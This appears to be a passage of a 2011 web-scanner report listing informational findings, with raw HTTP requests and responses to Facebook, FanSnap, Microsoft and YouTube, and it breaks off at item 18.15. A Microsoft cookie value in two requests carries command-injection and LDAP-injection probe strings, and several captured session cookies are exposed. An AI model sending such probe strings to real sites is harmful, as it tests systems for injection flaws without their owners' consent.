GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.230.40
X-Cnection: close
Date: Tue, 19 Jul 2011 16:03:58 GMT
Content-Length: 10143

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="styleshe
...[SNIP]...
<input name="partner_id" value="" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u143853_2"><input value="Sign Up" type="submit" id="u143853_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u143853_1").login();"><b>log in</b></a> to see what your friends like.</div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/fastteksRI" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/277119_115365331864877_4380483_q.jpg" alt="Fast-teks TechSolutions" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/fastteksRI" target="_blank"><span class="name">Fast-teks TechSolutions</span></a></div><div><div id="connect_widget_4e25aaee82a134218849257" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> ·&
...[SNIP]...

18.12. http://www.fansnap.com/developers previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fansnap.com
Path:	/developers

Request 1

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:44:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 14
ETag: "bfa7ab1f3b81c2b865b63d6a30d3b74a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgE5q87AGOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--d9a3777cedf14b19a925974c0f762f2ddc6ee6dd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12059
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<p id='app-signature'>
Last Updated: 2011-07-19 11:44:15 -0700 | REL-fansnap-1.20.2-r31787 | pgsdevelop-v0-c00000
</p>
</div>

</div>
</div>

<div id='locationModal'>
<form action='#' id='changeLocationForm'>
<label>
Zip Code:
</label>
<input id="zipcode" name="zipcode" type="text" />
<input id="saveLocation" name="commit" type="submit" value="Change" />
<div id='cancelLocation'></div>
</form>
</div>

<div class='sp1'></div>
<div class='clear'></div>
<script type="text/javascript">
//<![CDATA[
var fsi__ = { ch: 'fs', srv: 'ip-10-250-87-175', bld: 'REL-fansnap-1.20.2-r31787', vstId: 526671144, usr: {id: null, e: null}, st: ''};
//]]>
</script>
<script src="http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>

<script type='text/javascript'>
//<![CDATA[
fsTop.assetHost = 'http://cdn-%d.fansnap.com/REL-fansnap-1.20.2-r31787';
fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787';
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
fsTop.channel = new Channel({"code":null,"id":1,"name":"fs"}, false, "fansnap.com");
//]]>
</script>

<div class='fansnaptron' id='fbAuthModal'>
<iframe frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe>
<div class='fbAuthModalClose'>
<a class='fbAuthClose'>
Close
</a>
</div>
</div>

<div class='survey-confirm' id='fsAuthModal'>
<iframe frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe>
<div class='fsAuthModalClose'>
<a class='fsAuthClose'>
<img alt="Cancel" src="http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
</div>
</div>

<script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script>
<script type='text/javascript'>
//<![CDATA[
_uacct = "UA-4075898-1";
_udn = "fansnap.com";
urchinTracker();
//]]>
</script>

<div id='fb-root'></div>

<script type='text/javascript'>
//<![CDATA[
FBPackage.Authentication.init({domQu
...[SNIP]...

Request 2

GET /developers HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ver=1; vid=1342567440282625; tvid=1342567440282625; _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgL58u68GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--5b44033c581130d6faa8811aaffe669fa3974944; POOLID=B; __utma=19633071.1263508421.1311101027.1311101027.1311101027.1; __utmb=19633071; __utmc=19633071; __utmz=19633071.1311101027.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; lvd=1311101038

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:44:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 15
ETag: "5d18a8757744aca69695186d2ce46e37"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgLduDrEGOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--e43a29e9228ec2eaf0e52ea22c48e405800c3007; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12015
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<p id='app-signature'>
Last Updated: 2011-07-19 11:44:16 -0700 | REL-fansnap-1.20.2-r31787 | pgsdevelop-v0-c00000
</p>
</div>

</div>
</div>

<div id='locationModal'>
<form action='#' id='changeLocationForm'>
<label>
Zip Code:
</label>
<input id="zipcode" name="zipcode" type="text" />
<input id="saveLocation" name="commit" type="submit" value="Change" />
<div id='cancelLocation'></div>
</form>
</div>

<div class='sp1'></div>
<div class='clear'></div>
<script type="text/javascript">
//<![CDATA[
var fsi__ = { ch: 'fs', srv: 'ip-10-250-26-209', bld: 'REL-fansnap-1.20.2-r31787', vstId: 526671144, usr: {id: null, e: null}, st: ''};
//]]>
</script>
<script src="http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>

<script type='text/javascript'>
//<![CDATA[
fsTop.assetHost = 'http://cdn-%d.fansnap.com/REL-fansnap-1.20.2-r31787';
fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787';
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
fsTop.channel = new Channel({"code":null,"id":1,"name":"fs"}, false, "fansnap.com");
//]]>
</script>

<div class='fansnaptron' id='fbAuthModal'>
<iframe frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe>
<div class='fbAuthModalClose'>
<a class='fbAuthClose'>
Close
</a>
</div>
</div>

<div class='survey-confirm' id='fsAuthModal'>
<iframe frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe>
<div class='fsAuthModalClose'>
<a class='fsAuthClose'>
<img alt="Cancel" src="http://cdn-2.fansnap.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
</div>
</div>

<script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script>
<script type='text/javascript'>
//<![CDATA[
_uacct = "UA-4075898-1";
_udn = "fansnap.com";
urchinTracker();
//]]>
</script>

<div id='fb-root'></div>

<script type='text/javascript'>
//<![CDATA[
FBPackage.Authentication.init({domQu
...[SNIP]...

18.13. http://www.microsoft.com/worldwide/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.microsoft.com
Path:	/worldwide/

Request 1

GET /worldwide/ HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/worldwide
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; .ASPXANONYMOUS=g5rG90hmzAEkAAAAMDY4MDQ2YTgtNzVlOS00M2RmLTljMmYtZDU0NDZjZmZiNjdigDOIcfti2RfB0TjvnBWm5ZDDdIY1; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WT_NVR=1=online|online%26echo%20958ba620d3208f17%20b1de518eba83f9e9%26|en-us|windowsazure:2=online/help|windows/windowsintune:3=online/help/en-us|en-us/*)(sn|en-us/*)(sn|windows/business/windows-7-test-drive; mstcid=252c88bf; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 79197231300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:28:16 GMT
Content-Length: 50759

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Microsoft Worldwide Home</title>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

...[SNIP]...
order="0" hspace="0" vspace="0" src="http://c.microsoft.com/trans_pixel.asp?source=www&TYPE=PV&p=worldwide&URI=%2fworldwide%2fdefault.aspx&GUID=1F4FC18C-F71E-47FB-8FC9-612F8EE59C61&r=http%3a%2f%2fwww.microsoft.com%2fworldwide&lc=en-us"></div></layer>
   </body>
</HTML>

Request 2

GET /worldwide/ HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; .ASPXANONYMOUS=g5rG90hmzAEkAAAAMDY4MDQ2YTgtNzVlOS00M2RmLTljMmYtZDU0NDZjZmZiNjdigDOIcfti2RfB0TjvnBWm5ZDDdIY1; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WT_NVR=1=online|online%26echo%20958ba620d3208f17%20b1de518eba83f9e9%26|en-us|windowsazure:2=online/help|windows/windowsintune:3=online/help/en-us|en-us/*)(sn|en-us/*)(sn|windows/business/windows-7-test-drive; mstcid=252c88bf; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279982831500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:30:01 GMT
Content-Length: 50710

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Microsoft Worldwide Home</title>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

...[SNIP]...
border="0" hspace="0" vspace="0" src="http://c.microsoft.com/trans_pixel.asp?source=www&TYPE=PV&p=worldwide&URI=%2fworldwide%2fdefault.aspx&GUID=1F4FC18C-F71E-47FB-8FC9-612F8EE59C61&lc=en-us"></div></layer>
   </body>
</HTML>

18.14. http://www.youtube.com/v/JmxL5BlVzZQ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/v/JmxL5BlVzZQ

Request 1

GET /v/JmxL5BlVzZQ?version=3&enablejsapi=1&playerapiid=swfOnboarding&autohide=1&showinfo=0 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://news.google.com/
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 3225
Content-Type: application/x-shockwave-flash

CWS
....x..WKw......@5...A."%P...&..K"%Q.[`(..eGv............y$.,&+/y.,2........f6.}&>.f..0;..n...X..Cvw..W...Uu.%H.... D`gh..~5.?...U...;{...n..8z2[v..z".h4....i.%Rkkk..bbqq.%........}wv...av.....i..X-.u...l..T....-..,..LgUf8v".O!P....VUu6.ZM..U...\..f...^..MW...DW..8.Gg..%..b{:..-.6....'..K]C7z..r.x..&j.Y...&.\.^..Q....]f.F.87..7E..e..S.._.C.|]5......=ry.c.F.a..u=.Z..-&S)..N}.x..m
.p....'.\E......+.X    ....4vY.XK.>H=._K%S.ed....n6r...8..RH..P].....04*.f.$=.Zw.r..<...hh.m....S...>m:    d.*F.X...4].....q.?}u.m....4X.......E.E..TzE*K=....A..peK.....O.?-1M..N.......\TX#W4......p......Y...N.;.ic....Z.rL5J...l.P..g,..Y.aZzi6....M\..Y.o...........e.}.OZbf......Y..:3..r.fE.(..W.......^Z..A+.D.W..c.Z..'.Z.x......:.'....j.^Y<.Z}...l.,.t.....V..F.)...6....t.P.(..U......,.\...'.Y....i./.....y"8....I;..=.....z...r.S...<.h......Z<..e..g...1|..>d...Cr.....n.T.p.;...1....tS-m........l.Zs./LL%.s.u.....T..MS.I.......v.0.s    v..i...Zd.GjE...Zgu.@...<v..lB...........Z...5.....w.}....B.s.....'8.c.....3..a@k.t.....z........H@'..yr..c....*..W..05<.;..S..2.......................7...C.@h.<..ELdY.<...........(P.(.g.!.s.....q..a....'p..J..[7..N...\N.}F.8......d\...+.P.IG...?$.Cp.h..5}p*...LA.\.m...9..1I..g...j[......$....2..e...N..A...5t..o.G.=2Q.3q.*.......?od.+...<....F.'O..].+.&L...1W..$]M...w...MO0F..SoN;....Q...+........X.M..~).-.~..3>.;p.D....E.c&.*...{.k.]...%.E.../Dw...N1...]vw.yR.?.{...~....". 8...J.,...x+.$.%.;O..T............v..f...r.....A.._.i....zX...+f.a.oU...p...V..+...V.[....!..(vL...v..&>.mn..
7.....b..~S...y.@..5e..r=.a....    t........q.[j..`.....0'/.J)...qv..W..)..eZ....=....Q..t.4u..AO..Tt;..t..e..6...6....&....-..S......+w.{.....p.I=.f....Q.{...t:....C.\....ilv...ix&........{.V...'.F..H.l.....~.(.At.8.c..(.D..'p.u.z......6}.....sW'......{.&.......i.2MG.2G..X.i...*~.d)..L.&
...%.h...=w..'.x.L..Vtx8qRf...r.m.s..y.7..2..s..s9_u..'.=...l.........x....
.w..uFR"...<2..V.v`5SJ.._J..e+X........".J.....3......n6...w\..ENv.?.._~.I...j1ov;......<<.........n.h.0...`..A.0.>.c.#q.i..6.b..i....    i.Mw..
...[SNIP]...

Request 2

GET /v/JmxL5BlVzZQ?version=3&enablejsapi=1&playerapiid=swfOnboarding&autohide=1&showinfo=0 HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:47 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 3211
Content-Type: application/x-shockwave-flash

CWS
....x..WKw............H.2(.bL.x.%..(.-0.A..#.^...=....<3 ...8.....]...H..$.!.l.....d.../......D..C.L........K.....@......|6.G...*i.....eU7.u.=.-;Nm=.h4...R........Dr1......v.p.....3....0.hUjN.4b|.....xv..Z*^.....B..    ..*3.;.....T\.L..:.j..W.*.K\..e.x.P/....v.Q.+.u.......Y`.=.]..b.]}W........=.T.v.hV.5.,..h..P.r.
....z..3k.n..f...K.2E..../..q...gu..m......k.......K-......g..>J...6....O..
.W......J%V...1..]......S...R.Tr...........2.l..R.;T.....0......I.....\)1Ob.%..@..v..T.g.O.N.Y...(....M.....~..O_.h+&.f........F.,..\T......-..O?z/Q...4..;..kg.;.pQa.\..........H~....`.4.t.;b;..;a.U,.T...1.6U.|.bN......f..8...u^......_[YZL..._v....%f.*.....5
.3..).lV4..zwu    .[.........RO...$f...}l.....Y..9..|.a*..........^....rLw..<+m5.m.....j.Y..M.Pd...Z%.L7(.."......vrU....o..+.<.N.Y&s.........Vo..V...1.\....8.;V...u.x..Y?9.o#...._~@.A..;......n.t.5.U.b.n..m.R.......VkN.....r...Q.Y..J..;
8i_.R..N...fa..n.#m.[S...H..\.T....|.....c.M....w>.}..`]+.X.&..b....O.`...x.t..:...x..b..eF.7.h..n.p[.]/..<.9...    ...6ON.sl..=].C.J.....%..E> S...L....-....\I .,....{...<...f.syZ.D.%.../..|..?......2}...8'{L...........r.G.....u....]N....g....h[,.@.........t..
.C.?.w..J]........$.....\.......x.....e..*\.A.X..W(..QF.`..Q..@.]C.{.6z..#..1.... .{.....F....:.s..}n.}.Dz....m.dz..s.    O.....~W./...c.O;....|Z..u._p.e.[.N..Q,..E.....J......m.
"A
....1.u.._......V......c....mW^.........<)...].[q.o.{a.\..QtU%A.x....
.......X..../o..{.b.d;.|3}.N.bw.F. t./.....L=,Yp.......*.yt8i.......w.+.......n..;...j;....6..#....g.p1.}..+xJ....:....^`..20w.....l..G......-..R0.q..9...Y)..s8......./e..L.....g..W7...n...T#.i...n......,.........`.........={.m{.=...{..D.b.3.RCO..7+.w...../..u..../Wf0+l....(d...i.........U...I....2..........
w.]...X.:J9Q5.    .|.....8&..M_>?......'..!s...    y.w...{Z.L....Q..Ug..B.\.<YJ,&...B..c.6...u..w..;.;S.....N..Yo......9r.<..o.....u....:El....d`...ULZ[..@<g.`O...P.:#).o.A...@+z;..).../......S.U....P.g%._....n...Ln7..d.;..."'...g./>.$BvY..7......mo..nmn.X.}.b7{.y..Vk0Gy?{.e.........l.k.p.4..\.....;BO..n.u..KmG.3J<
...[SNIP]...

18.15. http://www.youtube.com/v/LpBCsQQ_v0U&autoplay=1 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/v/LpBCsQQ_v0U&autoplay=1

Request 1

